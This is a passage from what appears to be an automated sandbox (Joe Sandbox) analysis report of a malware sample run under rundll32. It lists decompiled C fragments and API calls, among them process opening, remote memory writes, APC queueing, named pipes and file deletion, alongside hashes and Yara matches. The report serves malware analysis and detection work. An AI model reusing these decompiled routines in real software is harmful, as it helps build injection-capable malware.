								_t53 = E03435450(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x343a348; // 0x21ad5a8
								_t22 = _t54 + 0x343b252; // 0x616d692f
								 *0x343a374 = _t22;
								goto L60;
							} else {
								_t64 = E03432FBC(0, _t53);
								 *0x343a374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x343a344; // 0x69b25f44
										_t56 = E03435450(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x343a348; // 0x21ad5a8
										_t23 = _t57 + 0x343b79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E03432FBC(0, _t56);
									}
									 *0x343a3e0 = _t58;
									HeapFree( *0x343a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                                0x03431645
                                0x03431645
                                0x03431645
                                0x03431645
                                0x03431648
                                0x03431665
                                0x03431673
                                0x03431673
                                0x03431678
                                0x03431692
                                0x03431900
                                0x03431907
                                0x0343190b
                                0x0343190b
                                0x03431698
                                0x0343169d
                                0x034316b5
                                0x034318ed
                                0x034318f7
                                0x00000000
                                0x034316bb
                                0x034316bb
                                0x034316bc
                                0x034316c1
                                0x034316d7
                                0x034316c3
                                0x034316c3
                                0x034316d0
                                0x034316d0
                                0x034316d9
                                0x034316e2
                                0x034316e4
                                0x034316ee
                                0x034316f3
                                0x034316f3
                                0x034316ee
                                0x034316fa
                                0x03431710
                                0x034316fc
                                0x034316fc
                                0x03431709
                                0x03431709
                                0x03431714
                                0x03431716
                                0x03431720
                                0x03431725
                                0x03431725
                                0x03431720
                                0x0343172c
                                0x03431742
                                0x0343172e
                                0x0343172e
                                0x0343173b
                                0x0343173b
                                0x03431746
                                0x03431748
                                0x03431752
                                0x03431757
                                0x03431757
                                0x03431752
                                0x0343175e
                                0x03431774
                                0x03431760
                                0x03431760
                                0x0343176d
                                0x0343176d
                                0x03431778
                                0x0343177a
                                0x03431784
                                0x03431789
                                0x03431789
                                0x03431784
                                0x03431790
                                0x034317a6
                                0x03431792
                                0x03431792
                                0x0343179f
                                0x0343179f
                                0x034317aa
                                0x034317ac
                                0x034317b6
                                0x034317bb
                                0x034317bb
                                0x034317b6
                                0x034317c2
                                0x034317d8
                                0x034317c4
                                0x034317c4
                                0x034317d1
                                0x034317d1
                                0x034317dc
                                0x034317ef
                                0x034317ef
                                0x00000000
                                0x034317de
                                0x034317de
                                0x034317e8
                                0x00000000
                                0x034317f9
                                0x034317f9
                                0x034317fb
                                0x03431811
                                0x034317fd
                                0x034317fd
                                0x0343180a
                                0x0343180a
                                0x03431815
                                0x03431817
                                0x0343181a
                                0x0343181b
                                0x03431822
                                0x03431824
                                0x03431825
                                0x03431825
                                0x03431822
                                0x0343182c
                                0x03431842
                                0x0343182e
                                0x0343182e
                                0x0343183b
                                0x0343183b
                                0x03431846
                                0x03431854
                                0x0343185e
                                0x0343185e
                                0x03431866
                                0x0343187c
                                0x03431868
                                0x03431868
                                0x03431875
                                0x03431875
                                0x03431880
                                0x03431893
                                0x03431893
                                0x03431898
                                0x0343189e
                                0x00000000
                                0x03431882
                                0x03431885
                                0x0343188a
                                0x03431891
                                0x034318a3
                                0x034318a5
                                0x034318bb
                                0x034318a7
                                0x034318a7
                                0x034318b4
                                0x034318b4
                                0x034318bf
                                0x034318cb
                                0x034318d0
                                0x034318d0
                                0x034318c1
                                0x034318c4
                                0x034318c4
                                0x034318de
                                0x034318e3
                                0x034318e9
                                0x00000000
                                0x034318ec
                                0x00000000
                                0x03431891
                                0x03431880
                                0x034317e8
                                0x034317dc

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 034316EA
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0343171C
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0343174E
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 03431780
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 034317B2
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 034317E4
                                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 034318E3
                                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 034318F7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 5457fa564186cb1e6b31e682484b5ca4190df5c6ca22d581016e7d6574129f59
                                • Instruction ID: 5c47dd967d3fa5adfa4acbe249d82ab05a759e1bc8b7ca4eaee8fb0a71993e79
                                • Opcode Fuzzy Hash: 5457fa564186cb1e6b31e682484b5ca4190df5c6ca22d581016e7d6574129f59
                                • Instruction Fuzzy Hash: 6F819278A40204AFC710FBB5DD84D5BB7EDEB5E60072C4D2BA445EF204E739D9458B29
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034765C2 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,03472028,?), ref: 0347867A
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,03472028,?), ref: 03478697
                                • FreeLibrary.KERNEL32(?), ref: 034766F8
                                  • Part of subcall function 0348AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,0347663D,?,?), ref: 0348AFCF
                                  • Part of subcall function 0348AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0347663D,?,?), ref: 0348AFF8
                                  • Part of subcall function 0348AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0348B018
                                  • Part of subcall function 0348AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 0348B034
                                  • Part of subcall function 0348AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B040
                                  • Part of subcall function 0348AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0347663D,?,?), ref: 0348B043
                                  • Part of subcall function 0348AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B04F
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B06C
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B086
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B09C
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B0B2
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B0C8
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B0DE
                                • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0347664E
                                • lstrlenW.KERNEL32(?), ref: 0347666A
                                • lstrlenW.KERNEL32(?), ref: 03476682
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0347669B
                                • lstrcpyW.KERNEL32(00000002), ref: 034766B0
                                  • Part of subcall function 03491C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,034766C0,?,00000000,?), ref: 03491CAB
                                  • Part of subcall function 03491C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,034766C0,?,00000000,?), ref: 03491CCD
                                  • Part of subcall function 03491C9B: lstrcpyW.KERNEL32(00000000,?), ref: 03491CF9
                                  • Part of subcall function 03491C9B: lstrcatW.KERNEL32(00000000,?), ref: 03491D0C
                                • FindNextFileW.KERNEL32(?,00000010), ref: 034766D8
                                • FindClose.KERNEL32(00000002), ref: 034766E6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                • String ID:
                                • API String ID: 1209511739-0
                                • Opcode ID: 5cc4c2cc326abd933447c8f6c56f83b7f2ade2f0478674be9d9dfda3a9d32a19
                                • Instruction ID: 4a8541dc7d4198cda023014f824d0bd1aa8a54bb76a883c4810553c7ca640d46
                                • Opcode Fuzzy Hash: 5cc4c2cc326abd933447c8f6c56f83b7f2ade2f0478674be9d9dfda3a9d32a19
                                • Instruction Fuzzy Hash: 1D416C71508305AFC711EF61D848AAFBBE9FB85B04F04092FF480EA260DB34D9198B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034799BC Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,00000000), ref: 034799D4
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 03479A3D
                                • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 03479A65
                                • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 03479AB7
                                • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 03479AC2
                                • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 03479AD5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                • String ID:
                                • API String ID: 499515686-0
                                • Opcode ID: 6d0b37368517e4273ec7d973b587b2f5975990d886c1e54bd7b10c75b7d96509
                                • Instruction ID: 657001eb53396a44c4199e78334acf9e40268230b05bb0b67486661a3697e1c2
                                • Opcode Fuzzy Hash: 6d0b37368517e4273ec7d973b587b2f5975990d886c1e54bd7b10c75b7d96509
                                • Instruction Fuzzy Hash: 18415E7490024AEFDF01EFA5CC88AEEBBB9FF01314F1444AAE511AE254DB70CA44DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348EAC5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348EAE7
                                  • Part of subcall function 03487950: NtAllocateVirtualMemory.NTDLL(0348EB0F,00000000,00000000,0348EB0F,00003000,00000040), ref: 03487981
                                  • Part of subcall function 03487950: RtlNtStatusToDosError.NTDLL(00000000), ref: 03487988
                                  • Part of subcall function 03487950: SetLastError.KERNEL32(00000000), ref: 0348798F
                                • GetLastError.KERNEL32(?,00000318,00000008), ref: 0348EBF7
                                  • Part of subcall function 034736BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 034736D3
                                • memcpy.NTDLL(00000218,034938A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0348EB76
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 0348EBD0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                • String ID:
                                • API String ID: 2966525677-3916222277
                                • Opcode ID: 8909105e0c36eaf14753472ef8eab88c31c41ec6f181a2fae717f9ebd8cf85a3
                                • Instruction ID: c7e44d1c8e3652449e26e36007caf09459f062dd368415cfc1486a1528f92992
                                • Opcode Fuzzy Hash: 8909105e0c36eaf14753472ef8eab88c31c41ec6f181a2fae717f9ebd8cf85a3
                                • Instruction Fuzzy Hash: 5031827590130AEFDB21EF69C985AAEB7F8EF04304F1445AFE516EB240D730EA848B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348D7F1 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: df8723daf9a2346b529d9396ca8e12f365eebb8c4ad5b843441b2a7b5a3e52bb
                                • Instruction ID: 4f4106d3583b17ec5ae4060a2be564beffcb3ea3cc3549b0039a10575c832597
                                • Opcode Fuzzy Hash: df8723daf9a2346b529d9396ca8e12f365eebb8c4ad5b843441b2a7b5a3e52bb
                                • Instruction Fuzzy Hash: 71F1D230901B95CFCB31DF69C5846AEB7F4FF52300F2449AEC5E79A681D231AA45CB18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034786AD Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0347E23D,00000000,76CDF5B0,03480348,?,00000001), ref: 034786CD
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034786E2
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034786FE
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03478713
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03478727
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc
                                • String ID:
                                • API String ID: 1469910268-0
                                • Opcode ID: 5f4c94e0b6635b5658af3ce84843a38065be78370b328fd99a40feed92ee1723
                                • Instruction ID: 426e70873d3697879e5862e2202766d8a0ac2bf30ed7399a288c7bd011eb1fff
                                • Opcode Fuzzy Hash: 5f4c94e0b6635b5658af3ce84843a38065be78370b328fd99a40feed92ee1723
                                • Instruction Fuzzy Hash: 9E315776A102219FDB01EF6CE887A9573E9FB69310B01419FE509EF318D774E8028F58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03436D78 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E03436D78(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x343a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x343a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x343a2f8 = _t6;
					 *0x343a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x343a2f4 = _t7;
					if(_t7 == 0) {
						 *0x343a2f4 =  *0x343a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                0x03436d80
                                0x03436d86
                                0x03436d8d
                                0x00000000
                                0x03436de7
                                0x03436d8f
                                0x03436d97
                                0x03436da4
                                0x03436da4
                                0x03436de4
                                0x00000000
                                0x03436de4
                                0x03436da6
                                0x03436da6
                                0x03436dab
                                0x03436dbd
                                0x03436dc2
                                0x03436dc8
                                0x03436dce
                                0x03436dd5
                                0x03436dd7
                                0x03436dd7
                                0x00000000
                                0x03436dde
                                0x03436da0
                                0x00000000
                                0x00000000
                                0x03436da2
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03431D07,?), ref: 03436D80
                                • GetVersion.KERNEL32 ref: 03436D8F
                                • GetCurrentProcessId.KERNEL32 ref: 03436DAB
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03436DC8
                                • GetLastError.KERNEL32 ref: 03436DE7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: e9d87c4d4e96d725a094760a10689566ec2ef6c4ccbba1c4b906ceebcf1f09f2
                                • Instruction ID: e9838be6ff30c8274b7377d16f7220fee43f1fe60c30dd44a74fdc17397a0f6e
                                • Opcode Fuzzy Hash: e9d87c4d4e96d725a094760a10689566ec2ef6c4ccbba1c4b906ceebcf1f09f2
                                • Instruction Fuzzy Hash: CDF0A470588303BBDB10EF249949BA53BF0AB4A711F154016E992FF3C8D7B9C050CB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347D77A Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0347D7D0
                                • lstrlenW.KERNEL32(?), ref: 0347D7DE
                                • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0347D809
                                • lstrcpyW.KERNEL32(00000006,00000000), ref: 0347D837
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Query$lstrcpylstrlen
                                • String ID:
                                • API String ID: 3961825720-0
                                • Opcode ID: 029ae5cef2fb869ff22d26624ecdc45d7a3884e1eccd07c44c43cb95c5b620e9
                                • Instruction ID: 8747c2a26684d8492a1e29498096bc57a2f827a849cf253e408af867d8f5ee5d
                                • Opcode Fuzzy Hash: 029ae5cef2fb869ff22d26624ecdc45d7a3884e1eccd07c44c43cb95c5b620e9
                                • Instruction Fuzzy Hash: 3B416A71910209EFDF11DFA8C885EEEBBB8EF05314F15406AF915AB260D730DA11CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034881F1 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                Download Yara Rule
                                APIs
                                • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0349A1E8,00000001), ref: 03488215
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488260
                                  • Part of subcall function 034873AA: CreateThread.KERNEL32(00000000,00000000,00000000,0348893A,0349A174,03490998), ref: 034873C1
                                  • Part of subcall function 034873AA: QueueUserAPC.KERNEL32(0348893A,00000000,?,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873D6
                                  • Part of subcall function 034873AA: GetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873E1
                                  • Part of subcall function 034873AA: TerminateThread.KERNEL32(00000000,00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873EB
                                  • Part of subcall function 034873AA: CloseHandle.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873F2
                                  • Part of subcall function 034873AA: SetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873FB
                                • GetLastError.KERNEL32(03481FE9,00000000,00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488248
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488258
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                • String ID:
                                • API String ID: 1700061692-0
                                • Opcode ID: 6af3a1b6750249485c94d76ca3a981e16c28a0898b05a1d1ee496e14bad5866b
                                • Instruction ID: b3e6ea788cb1800ab6db08e5d0449fa982340b36630a1f0838673e7e867f6494
                                • Opcode Fuzzy Hash: 6af3a1b6750249485c94d76ca3a981e16c28a0898b05a1d1ee496e14bad5866b
                                • Instruction Fuzzy Hash: CEF0A9713052016FE311BBA9DC49E2F7798EB46330B350237F925DE280D6700C068679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347B7D5 Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0347B7E9
                                • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0347B829
                                  • Part of subcall function 03485312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0348907F,?,00000004,00000000,00000004,?), ref: 03485330
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 0347B832
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                • String ID:
                                • API String ID: 4036914670-0
                                • Opcode ID: a6abb20343773ff6a60363e1fa034e6acdcb256d30276db66550957d3cdb85a5
                                • Instruction ID: f849d6319171ce971cdda9d80f693e5dc6487b88840ec74d0caf3f9320b845f5
                                • Opcode Fuzzy Hash: a6abb20343773ff6a60363e1fa034e6acdcb256d30276db66550957d3cdb85a5
                                • Instruction Fuzzy Hash: 22014639900208FFEB11EBA6EC08DEEBBBDEB85700F100066FA01EA150E770D904DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03483829 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0348385A
                                • RtlNtStatusToDosError.NTDLL(C000009A), ref: 03483891
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                • String ID:
                                • API String ID: 2533303245-0
                                • Opcode ID: e53623e07cb37263730ee385b16797855de6d446e5051e504e1b9768b5d5391d
                                • Instruction ID: 278f688d2e5f37cd257e3174c427415a9e3174b1cfaacf1c531c345190cab8bb
                                • Opcode Fuzzy Hash: e53623e07cb37263730ee385b16797855de6d446e5051e504e1b9768b5d5391d
                                • Instruction Fuzzy Hash: 6301673E902224BBD722FF558808AAFB6A99F45F54F15096AAD016F200E7708A0196D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034764C4 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 034764E3
                                • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 034764FB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationProcessQuerymemset
                                • String ID:
                                • API String ID: 2040988606-0
                                • Opcode ID: e6c81ed91e1f85f707184650741371884f5d1504ee74681130a8aa9e0b32e80e
                                • Instruction ID: 2677daedd9b9fad32150607ed9f4482243fee4797503e812aa36bc680bca7b11
                                • Opcode Fuzzy Hash: e6c81ed91e1f85f707184650741371884f5d1504ee74681130a8aa9e0b32e80e
                                • Instruction Fuzzy Hash: 5AF062B690022CBEDB10EB91DC09FDEBFBCDB04750F0040A1AE08EA190E774DB458BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485220 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0348524D
                                • SetLastError.KERNEL32(00000000,?,0347C670,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 03485254
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$LastStatus
                                • String ID:
                                • API String ID: 4076355890-0
                                • Opcode ID: 6f0dd28da4fe812ee9f14c8cdeffcbeb14afe5904ba8264c441e42c5e73706a9
                                • Instruction ID: de12f2c4b80418218aef177cbd94a45e71ec514ef8616f98b10b2f7357f07dcc
                                • Opcode Fuzzy Hash: 6f0dd28da4fe812ee9f14c8cdeffcbeb14afe5904ba8264c441e42c5e73706a9
                                • Instruction Fuzzy Hash: C1E04832500119ABCF026FE8DC05D9F7B99EB1D751B008052FE11EA110CB31D4219FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348FF4D Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 03490327
                                • memset.NTDLL ref: 03490336
                                  • Part of subcall function 03478E0C: memset.NTDLL ref: 03478E1D
                                  • Part of subcall function 03478E0C: memset.NTDLL ref: 03478E29
                                  • Part of subcall function 03478E0C: memset.NTDLL ref: 03478E54
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                                • Instruction ID: e6c73c3e8d0aa2417a764634853e35f8d95f6923006c9ac380ef46382f444c78
                                • Opcode Fuzzy Hash: 341406b789a4962d08c25e45005e78c00e508755fad212ceb06da4480133e7e8
                                • Instruction Fuzzy Hash: 9C021170901B218FDB75CB29C690527BBF5BF44610B644E6FC6E78AA90D632F885CB08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348154D Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
